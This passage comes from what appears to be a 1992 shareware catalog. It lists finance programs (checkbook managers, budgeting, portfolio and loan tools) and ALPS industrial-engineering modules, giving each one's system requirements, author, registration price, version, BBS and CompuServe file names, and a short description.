TexaSoft, 214-291-2115 + Registration: $19.00 + Version: 1.0 (06-01-91) + User benefits: Registration, newsletter. + Look for: LOAN.EXE on BBSs; LOAN.EXE in IBMAPP forum LIB 6 on + CompuServe. + Download size: 80k + Description: + Calculates payment for any amortized loan, paid by week, month, + year or other periods. Calculates and prints a full + amortization table. Also produces a loan comparison table by + interest rate and payoff period. + + Chapter 9, "Finances" 225 + + + + Product: Money Smith + Needs: IBM AT (80286), Windows 3.0 or better. Mouse. + Author: Money Smith Systems + Registration: $29.95 + Version: 1.2 (09-15-91) + User benefits: Latest disk; Coupon for free upgrade to next + version through Dec 31 1992; 90 days support with money back if + not satisfied. + Look for: SMITH12A.ZIP on BBSs (call 617-354-8873 to download it + at no charge); SMITH.ZIP in IBMAPP forum LIB 4 on CompuServe. + Download size: 180k + Description: + A full featured double entry home accounting system for + Windows. Powerful point and press help and a toolbar make it a + snap to use. Windows setup program and help included. + + Includes budgeting, investment tracking, and full reporting of + assets, income, liabilities and expenses. Up to 200 accounts + per file and 32,000 transactions. Reports include investments, + net worth, income, budgeting, tax summary and check + reconciliation. Dynamic graphs for each type of account and + groups of accounts. + + Product: THE MORTGAGE MISER + Needs: IBM PC, DOS 2.0 or better. IBM compatible printer. Hard + disk recommended. + Author: Practical Solutions, 206-868-3336 + Registration: $39.95 + Version: 1.3 (01-15-92) + User benefits: Latest version, 90 days free support, notification + of new upgrades and programs as released. + Look for: MISER.ZIP on BBSs (call 800-659-8750 to download it at + no charge). + Download size: 92k + Description: + A powerful planning tool designed to assist people in + developing their own loan strategies. You can quickly and + easily build, save and revise models to make your own + comparisons on new loans, refinance and acceleration options. + Solve for unknown interest rate, term, payment or principal + amount. Use the "What If" variables to discover the dynamic + effects of prepayments to principal in terms of interest + savings. Provides the answers homeowners really need. + + Chapter 9, "Finances" 226 + + + + Product: My Little Realm [***] + Needs: IBM PC, DOS 3.3 or better. 512k RAM, hard disk, CGA + monitor. + Author: My Little Realm + Registration: $40.00 + Version: 1.0 (04-01-92) + User benefits: Phone/CompuServe/mail support; newsletter. + Look for: availability unknown on BBSs. + Download size: 2000k + Special instructions: Product distribution restricted to the + United States. + Description: + This menu-driven system lets you balance your checkbook; + monitor charge card expenditures; query those files; track and + total savings accounts; create name/address/phone database to + print labels, address envelopes, look up phone numbers, find + services (like Yellow Pages); make personal library for books, + compact disks, video tapes, etc.; create "memory" records to + help locate important documents like wills, Savings Bonds, + passports, anything; backup and retrieve your files; and more! + + Product: PC-GL General Ledger + General Ledger. See full description on page 176. + + Product: PCBUDGET [***] + Needs: IBM PC, DOS 2.1 or better. Hard disk recommended. + Author: ProLogic Software, 513-677-1754 + Registration: $35.00 + Version: 2.5 (03-24-92) + User benefits: Printed manual, next version free, support. + Look for: availability unknown on BBSs; PCBDGT.ZIP in IBMAPP + forum LIB 4 on CompuServe. + Download size: 339k + Description: + A simple and organized budgeting tool which can be used as a + simple checkbook manager or as a detailed record keeping and + tracking home accounting system. You can keep track of your + checking accounts, bank accounts, assets, expenses, incomes, + credit cards, loans, and bills. Can estimate your income + taxes, remind you of upcoming payments, print your checks, and + display a variety of reports. Completely menu driven with + mouse support and on-line help. + + Chapter 9, "Finances" 227 + + + + Product: Point & Shoot Home Manager + Needs: IBM PC, DOS 2.0 or better. 320k RAM. + Author: Applied Micro Systems Technology, 405-377-0444 + Registration: $35.00 + Version: 2.0 (09-01-88) + User benefits: Disk with latest version, manual, free support and + update notices. + Look for: availability unknown on BBSs; PASH20.ZIP in IBMAPP + forum LIB 4 on CompuServe. + Download size: 120k + Description: + A collection of dedicated databases for complete home budgeting + and accounting, tracking of home maintenance, home inventory + and important record tracking, name and address tracking, and + vehicle maintenance recordkeeping. A full-featured financial + calculation system is included. This is not simply a home + budgeting or checkbook program like so many others, this is a + comprehensive home management system. + + Product: Savings Account Management Prg. + Needs: IBM PC, DOS 2.1 or better. + Author: M. P. Data, 615-349-7744 + Registration: $25.00 + Version: 1.0 (06-22-89) + User benefits: Printed manual, current version, reduced price on + future upgrades, notification of upgrades and other M.P.Data + software. + Look for: SAVINGS*.ZIP on BBSs. + Download size: 300k + Description: + Maintains records for a savings account. Transactions include + deposits, withdrawals, auto-teller deposits and withdrawals, + interest, and service charges. Current balance is readily + displayed. Numerous reports, including several ways to list + transactions, expenditure summary in table form, and account + summary report. + + Product: WinCheck + Needs: IBM AT (80286), Windows 3.0 or better. Mouse strongly + recommended. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $69.99 + Version: 3.0A (03-15-91) + User benefits: Printed Manual, tech support, 90-day money back + gaurantee. + Look for: WCK30A.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WCK30A.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 350k + Description: + A new generation checkbook management program for the home and + small business market. It has stunning visuals and 3-D + effects. Transactions such as check writing, saving account + transactions, deposits, interest accrued, cash machine advances + and much more are all included. Designed to manage any number + + Chapter 9, "Finances" 228 + + + + of accounts. Data can be exported to Excel, 123, or dBase. It + can print checks and reports. Former Quicken users can easily + update to WinCheck with our new conversion program. + + 9.2.2 Checkbook managers + + Product: Checkbook Management Program + Needs: IBM PC, DOS 2.1 or better. + Author: M. P. Data, 615-349-7744 + Registration: $35.00 + Version: 5.03 (05-07-90) + User benefits: Printed manual, current version, reduced price on + future upgrades, notification of upgrades and other M.P.Data + software. + Look for: CHECKS*.ZIP (multiple files) on BBSs. + Download size: 400k + Description: + Eases checkbook maintenance. Transactions include checks, + deposits, auto-teller deposits and withdrawals, interest, and + bank and service charges. Current balance displayed often. + + Prints checks on any printer and any check form. Numerous + reports, including several ways to list transactions, + expenditure and income summaries in a table form, and account + summary report. + + Product: DJ-CHECK [***] + Print checks on DeskJet printers. See full description on + page 50. + + Product: EASY BANKING [***] + Business or Personal Banking Information Mgr. See full + description on page 221. + + Product: EliteCheck + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Taewoong Jeon + Registration: $25.00 + Version: 1.1a (10-01-91) + User benefits: Printed manual, a free upgrade, upgrade notices, + 90-day technical support, 30-day return policy no questions + asked. + Look for: ECS11A.EXE on BBSs; ECS11A.EXE in IBMAPP forum LIB 4 on + CompuServe. + Download size: 210k + Description: + A checkbook/budget manager for home/small business use. + Spreadsheet-style Register. Extremely easy to use, yet + powerful. + v/ edits directly in the check register + v/ add, delete, change, clear, void & unvoid transactions + v/ reconciliation + v/ print income/budget statement + v/ pull-down menu + + Chapter 9, "Finances" 229 + + + + v/ context-sensitive help + v/ up to 30 accounts, 32,767 transactions per account + v/ 4 separate category sets, up to 100 categories for each + v/ up to 100 recurrent payees + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 141. + + Product: QPACS + Needs: IBM PC, DOS 2.0 or better. + Author: Richard A. Williams, 815-455-6333 + Registration: $22.00 + Version: 3.2 (01-01-92) + User benefits: Master disks, one free upgrade. + Look for: availability unknown on BBSs; QPACS.ZIP in IBMAPP forum + LIB 3 on CompuServe; QPACS.ZIP in IBMPC RTC LIB 6 on GEnie. + Download size: 85k + Description: + Designed to provide financial management functions for + individuals and families. The following functions are + provided: checkbook entries for up to nine bank accounts; + check printing with a recurring check file; check registers; + budget entry and actual-to-budget reports; ability to record + and track assets, liabilities, and investments; net worth + calculation and printout; index card file and a household + inventory file. + + Product: WinCheck + Personal Finance Manager for WIndows 3.0. See full description + on page 227. + + + 9.3 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: $tokTraX + Stock portfolio and charting system. See full description on + page 230. + + Chapter 9, "Finances" 230 + + + + 9.4 Portfolio management + + Product: Capital Gainz [***] + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Author: DBLinx, 919-469-5196 + Registration: $39.00 + Version: 3.0 (02-24-92) + User benefits: Printed manual, free upgrade, support, bonus + utilities. + Look for: availability unknown on BBSs; CPGNZ*.ZIP in INVFOR + forum LIB 9 (multiple files) on CompuServe. + Download size: 550k + Description: + A portfolio manager for both small investors and professional + investment managers. Ideal for a 'dollar-cost averaging' + strategy. Record purchases, sales, dividends, capital gains; + calculate gain/loss and total return; view or print information + for one or more securities and over a range of dates; reinvest + dividends; record stock splits; execute sales of multiple + purchases using FIFO, LIFO, max gain, max loss, specific ID, + average cost; determine allocation; generate tax forms. 300+ + page manual. + + Product: Money Smith + Home Accounting Package for Windows 3.0. See full description + on page 224. + + Product: ORGANIZE! Your Art [***] + Cataloging system for all types of art. See full description + on page 323. + + Product: $tokTraX + Needs: IBM PC, DOS 2.11 or better. Hard disk; CGA or AT&T + graphics. + Author: Stoktrax Systems + Registration: $49.00 + Version: 4.05 (02-24-92) + User benefits: Registration code, six months support, guarantee. + Look for: STX405.ZIP on BBSs; STX405.ZIP in INV:STOCKS forum LIB + 1 on CompuServe; STX405.ZIP in INVESTORS RTC LIB 4 on GEnie. + Download size: 596k + Description: + Complete stock investment program that provides all the + features that most investors will ever need: manage up to 200 + portfolios, with summary and detailed reports; excellent + graphics can chart over 8 years of daily data; database of + 8000+ names & symbols; statistical data analysis; two broker + commission estimators; conversion utility translates data + captured from CompuServe, GEnie, Prodigy, and others; extensive + mouse support; much more! Users in over 40 U.S. and 6 foreign + states. + + Chapter 9, "Finances" 231 + + + + 9.5 Finance utilities + + Product: AFFORD IT??? + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Author: Garrett Krueger Software Development, 612-776-9942 + Registration: $22.00 + Version: 3.02 (08-22-91) + User benefits: Master disks, phone/mail support. + Look for: AFFORD.ZIP on BBSs (call 317-856-2087 to download it at + no charge). + Download size: 256k + Description: + A super calculation system which you MUST have if you SAVE + money. Determines future values on annuities and fixed + principles. It will track your loans and calculate loan + payment amounts using standard amortization and/or fixed + principle reductions. The Rule of 78's is used to find the + payoff amount on a loan. If you are living from your savings + account, it will tell how long money will last and how much can + be withdrawn. Includes on-screen "pocket" calculator usable + with DOS too. + + Product: YieldBook + Needs: IBM PC, DOS 3.0 or better. + Author: Compound Solutions + Registration: $25.00 + Version: 1.2 (02-17-92) + User benefits: Three months mail support; bonus utilities. + Look for: availability unknown on BBSs; YB.ZIP in INVFORUM forum + LIB 2 on CompuServe. + Download size: 30k + Description: + Calculates prices and yields on corporate, muncipal and US + Government bonds to either the call date or maturity in + accordance with security industry standards. + + + 9.6 Other + + Product: AMORTIZATION TABLE + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $29.95 + Version: 3.52 (04-26-91) + User benefits: Lates version with printed manual. + Look for: AMRTABLE (multiple files) on BBSs. + Download size: 130k + Description: + A 360 day year loan amortization program that calculates and + prints amortization schedules for loans up to $999,999,999.00. + Does schedules for 1, 2, 4, 12, 24, 26 or 52 payments per year. + Prints either full or end-year-total-only schedules. Creates + regular, interest-only, and discounted loan schedules with + simple APR (equal payment date interval) calculation. + + Chapter 9, "Finances" 232 + + + + Additional 'Principal-Only' payments may be added. Supports + dot matrix or laser printers. + + Product: AS-EASY-AS + Extraordinary Spreadsheet. See full description on page 135. + + Product: Charge Account Management Prog. + Needs: IBM PC, DOS 2.1 or better. + Author: M. P. Data, 615-349-7744 + Registration: $25.00 + Version: 1.11 (11-08-89) + User benefits: Printed manual, current version, reduced price on + future upgrades, notification of upgrades and other M.P.Data + software. + Look for: CHARGE*.ZIP (multiple files) on BBSs. + Download size: 300k + Description: + Helps you keep a handle on your credit cards. Up to 50 charge + accounts may be managed by this program. Transactions include + charges, payments, interest, and credits. + + Numerous reports can be limited to a single account or all + accounts and include several ways to list transactions, an + expenditure summary table (by month and budget category), and + an account summary listing giving the bottom line for each + account. + + Product: PAYMENT BOOK WRITER + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $19.95 + Version: 2.0 (04-13-91) + User benefits: Latest version with printed manual. + Look for: PMTBOOK (multiple files) on BBSs. + Download size: 86k + Description: + Prints payment coupon books for either the loan company, or + personal lender. The books can be printed on either 8-1/2 x 11 + inch paper then cut on a trimming board, or on 8-1/2 x 3-1/2 + perfed paper. Prints your letterhead, increments date, and + prints final payment amount along with a small disclaimer/ + disclosure statement on each page. When finished, simply tear + off the right tractor margins, leave the left margins on, then + staple the left margins along with a cover of your choice. + + Chapter 10, "Engineering" 233 + + + + + + Chapter 10 + Engineering + + See also: Graphics, CAD/CAM applications (page 309). + + + 10.1 Industrial engineering + + Product: ALPS + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $0.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 30k + Description: + The entry menu into the Industrial Engineers Tool Box. It acts + as program or process controller for the 20 programs within the + tool box & alerts the operator when a module called for is not + on the hard disk. This program is the only one in the I E Tool + Box that has a registration reminder screen. To properly + evaluate the I E Tool Box, all 20 programs are required. + + Product: ALPS(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $0.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 30k + Description: + The entry menu into the Personal Consultant. It acts as + program or process controller for the 18 programs within the + system & alerts the operator when a module called for is not on + the hard disk. This program is the only one in the Personal + Consultant that has a registration reminder screen. To + properly evaluate the Personal Consultant, all 18 programs are + required. + + Chapter 10, "Engineering" 234 + + + + Product: Architectural Engineering + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 34k + Description: + AE is an adjunct to the Facilities Management Section of the + Industrial Engineers Tool Box. It is the initializer for PC- + KEY DRAW, where an ALPS custom library of architectural symbols + can be used for facility drawings from layout planning to + repair & alteration development. Here also, work station unit + modules can be made & stored to simplify drawing detailed + layouts, or operation requirements. Proper evaluation of the I + E Tool Box requires all 20 programs. + + Product: CNC-Transedit + A CNC Transfer/File manager/Editor/Math prog. See full + description on page 251. + + Product: Complement & Schedules + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + Tool Box. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 87k + Description: + Allows development of a data base of complement information + most often needed by managers to manage the operation. This + data base can report on seniorities for bidding purposes. It + can also be used for developing weekly work schedules, showing + variations to the normal schedule for vacation, sickness, etc., + plus other than fulltime regulars. Proper evaluation of the IE + Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 235 + + + + Product: Complement & Schedules(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 87k + Description: + Allows development of a data base of complement information + most often needed by managers to manage the operation. This + data base can report on seniorities for bidding purposes. It + can also be used for developing weekly work schedules, showing + variations to the normal schedule for vacation, sickness, etc., + plus other than full time regulars. Proper evaluation of the + Personal Consultant requires all 18 programs. + + Product: Custodial Requirements + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 84k + Description: + A module within the Facilities Management section of the + Industrial Engineers Tool Box. It develops workhour + requirements by operation. It can be used to develop employee + work assignments when used with a detailed CAD layout drawing, + showing blocked out assignments coded with cleaning needs & + freqs.. Also builds fringe benefits into workhours to allow + development of overall staffing requirements. Proper + evaluation of the I E Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 236 + + + + Product: Custodial Requirements(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 84k + Description: + A module within the Facilities Management Section of the + Personal Consultant. It develops workhour requirements by + operation. It can be used to develop employee work assignments + when used with a detailed CAD layout drawing, showing blocked + out assignments coded with cleaning needs & frequencies. Also + builds fringe benefits into workhours to allow development of + overall staffing requirements. Proper evaluation of the + Personal Consultant requires all 18 programs. + + Product: Decision Analysis + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 80k + Description: + Allows alternative analysis in all areas of the Industrial + Engineers Tool Box. It develops discounted differential cash + flows, showing benefit/cost ratios, & ROI or IRR can be + developed. Building salvage values (w/decay & obsolescence) + can be developed. Amortization tables (incl. accelerated pay- + off strategies), & straight line or sum of the years + depreciation tables can be developed. Proper evaluation of the + I E Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 237 + + + + Product: Decision Analysis(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP] forum LIB 13 (multiple files) on CompuServe. + Download size: 80k + Description: + Allows alternative analysis in all areas of the Personal + Consultant. It develops discounted differential cash flows, + showing benefit/cost ratios, & ROI or IRR can be developed. + Building salvage values (w/decay & obsolescence) can be + developed. Amortization tables (incl. accelerated pay-off + strategies), & straight line or sum of the years depreciation + tables can be developed. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Product: Easy Project + Project Management Software. See full description on page 199. + + Product: EE + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS3.EXE (multiple files) on BBSs; ALPS3.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 35k + Description: + EE is included in the Industrial Engineers Tool Box as a + library initializer & instruction for a customized electronics + library of symbols created by ALPS Software in PC-KEY DRAW. + Schematic diagrams can be generated. Proper evaluation of the + Industrial Engineers Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 238 + + + + Product: Flow Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support, + upgrade discounts. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module within the Work Measurement Section of the Industrial + Engineers Tool Box. It develops tables to track material + through operations used for one component, then initializes PC- + KEY DRAW to use an ALPS Software customized process chart + symbol library to draw a flow process chart. Proper evaluation + of the I E Tool Box requires all 20 programs. + + Product: Flow Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module within the Work Measurement Section of the Personal + Consultant. It develops tables to track material through + operations used for one component, then initializes Draft + Choice to use an ALPS Software customized process chart symbol + library to draw a flow process chart. Proper evaluation of the + Personal Consultant requires all 18 programs. + + Product: Furniture & Equipment Survey + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support, upgrade discounts. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 63k + Description: + A module within the FMS section of the Industrial Engineers + Tool Box. It catalogs furniture & equipment by operation, and + allows assignment of work station units to each operation. + This data is useful also in developing operation requirements, + equipment needs and costs by operation &/ or floor. The Work + + Chapter 10, "Engineering" 239 + + + + Station Unit by operation data is useful in developing + standardized detail drawings in a CAD system. Proper evaluation + of the I E Tool Box requires all 20 programs. + + Product: Furniture, Equipment Survey(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support, upgrade discounts. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 63k + Description: + A module within the FMS section of the Personal Consultant. It + catalogs furniture & equipment by operation & allows assignment + of work station units to each operation. This data is useful + also in developing operation requirements, equipment needs and + costs by operation &/or floor. The Work Station Unit by + operation data is useful in developing standardized detail + drawings in a CAD system. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Product: Graphical Representation + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 47k + Description: + A module within the Facilities Management Section of the + Industrial Engineers Tool Box. It allows visualization of data + developed in Layout Planning, Furniture & Equipment Survey & + Overhead Cost programs. Scaled output is in calibration + charts, space utilization, square foot cost/operation, + equipment cost/operation & more. Proper evaluation of the I E + Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 240 + + + + Product: Graphical Representation(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support, upgrade discounts. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 47k + Description: + A module within the Facilities Management Section of the + Personal Consultant. It allows visualization of data developed + in Layout Planning, Furniture & Equipment Survey & Overhead + Cost programs. Scaled output is in calibration charts, space + utilization, square foot cost/opera- tion, equipment cost/ + operation & more. Proper evaluation of the Personal Consultant + requires all 18 programs. + + Product: Layout Planning + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 65k + Description: + A module of the FMS of the Industrial Engineers Tool Box. It + aids in efficient & optimum use of space, reducing operating + costs through reduced walking time, improved ability to + supervise, improved communications between operations & + improved ability to share manpower & equipment. It can identify + needs for space &/or furniture & equipment, when used with + Furniture & Equipment Survey. Proper evaluation of the I E + Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 241 + + + + Product: Layout Planning(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: . + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 65k + Description: + A module of the FMS of the Personal Consultant. It aids in + efficient & optimum use of space, reducing operating costs + through reduced walking time, improved ability to supervise, + improved communications between operations & improved ability + to share manpower & equipment. It can identify needs for space + &/or furniture & equipment, when used with Furniture & + Equipment Survey. Proper evaluation of the Personal Consultant + requires all 18 programs. + + Product: Man/machine Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Industrial + Engineers Tool Box. It develops tables to track man & machine + utilization & downtimes, then initializes PC-KEY DRAW to use an + ALPS Software custom process chart library to draw a man/ + machine process chart. Proper evaluation of the I E Tool Box + requires all 20 programs. + + Product: Man/Machine Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Personal + Consultant. It develops tables to track man & machine + utilization & down times, then initializes Draft Choice to use + an ALPS Software custom process chart library to draw a man/ + + Chapter 10, "Engineering" 242 + + + + machine process chart. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Product: Methods Time Measurement + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 68k + Description: + MTM is a module in the Work Measurement Section of the Indust- + rial Engineers Tool Box. It should only be used by a cert- + ified analyst, and as such, does not include the TMU chart + supplied by the MTM Association. It does all the grunt work + after the analyst fills in the frequencies, TMU's, & motion + descriptions. It takes the data developed in element or + methods analysis into summary form. Proper evaluation of the I + E Tool Box requires all 20 programs. + + Product: Methods Time Merasurement(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 68k + Description: + A module in the Work Measurement Section of the Personal + Consultant. It should only be used by a certified analyst, and + as such, does not include the TMU chart supplied by the MTM + Association. It does all the grunt work after the analyst + fills in the frequencies, TMU's & motion descriptions. It + takes the data developed in element or methods analysis into + summary form. Proper evaluation of the Personal Consultant + requires all 18 programs. + + Chapter 10, "Engineering" 243 + + + + Product: Operation Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module of the Work Measurement Section of the Industrial + Engineers Tool Box. It collects data for an operation process + chart, showing the overall actions of producing a product + through operations with materials used. Then it initializes PC- + KEY DRAW to use an ALPS Software custom process chart library + to draw an operation process chart. Proper evaluation of the I + E Tool Box requires all 20 programs. + + Product: Operation Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module of the Work Measurement Section of the Personal + Consultant. It collects data for an operation process chart, + showing the overall actions of producing a product through + operations with materials used. Then it initializes Draft + Choice to use an ALPS Software custom process chart symbols + library to draw an operation process chart. Proper evaluation + of the Personal Consultant requires all 18 programs. + + Product: Operator Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master 